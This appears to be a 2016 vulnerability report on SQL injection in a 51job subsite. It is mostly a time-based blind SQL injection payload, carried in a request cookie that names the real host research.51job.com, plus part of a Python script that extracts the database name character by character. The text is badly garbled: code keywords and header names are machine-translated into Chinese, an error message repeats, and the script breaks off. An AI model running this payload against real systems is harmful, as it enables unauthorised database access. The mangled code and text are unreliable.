51job分站存在SQL注入

漏洞标题 51job分站存在SQL注入 相关厂商 前程无忧(51job) 漏洞作者 路人甲 提交时间 2016-06-10 18:51 公开时间 2016-06-17 11:00 漏洞类型 SQL注射…

从对等方接收数据时失败 从对等方接收数据时失败 x='ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM;读取列表=196%2C25%2C294%2C340%2C307; orderlist=-1)%3Bif(ascii(substring(DB_NAME(),'+ str(i)+',1))>'+ str(ord(payload))+')%20waitfor%20delay%20' 0: 0: 10'%20 - %20; Hm_lvt_2fb608bf1ad8b9b8ce2e04 * 003184e=1465491620,1465491620,1465491621,1465491621; Hm_lpvt_2fb608bf1ad8b9b8ce2e04 * 003184e=1465491621; HMACCOUNT=CE77C9E3D0040FF7' headers={ '主持':'research.51job.com', '接受':'*/*', 'User-Agent':'Mozilla/5.0(Macintosh; Intel Mac OS X 10_11_5)AppleWebKit/537.36(KHTML,类似Gecko)Chrome/50.0.2661.102 Safari/537.36', 'Accept-Encoding':'gzip,deflate,sdch', 'Accept-Language':'zh-CN,zh; q=0.8,en; q=0.6,ja; q=0.4', 'X-Requested-With':'XMLHttpRequest', 'Referer':'http://research.51job.com/', '连接':'保持活力', 'Cookie': x } 返回标题 Def exploit(): Res='' Url='http://research.51job.com/order.html' Payloads=['@','_','。'] + list(string.ascii_lowercase)+ list(string.ascii_uppercase)+ [str(i)for i in range(10)] Payloads=sorted(payloads,reverse=True) 对于范围(1,30,1):中的i 对于有效负载:中的有效负载 试试: Headers=getPayloadCookie(i,payload) 从对等方接收数据时失败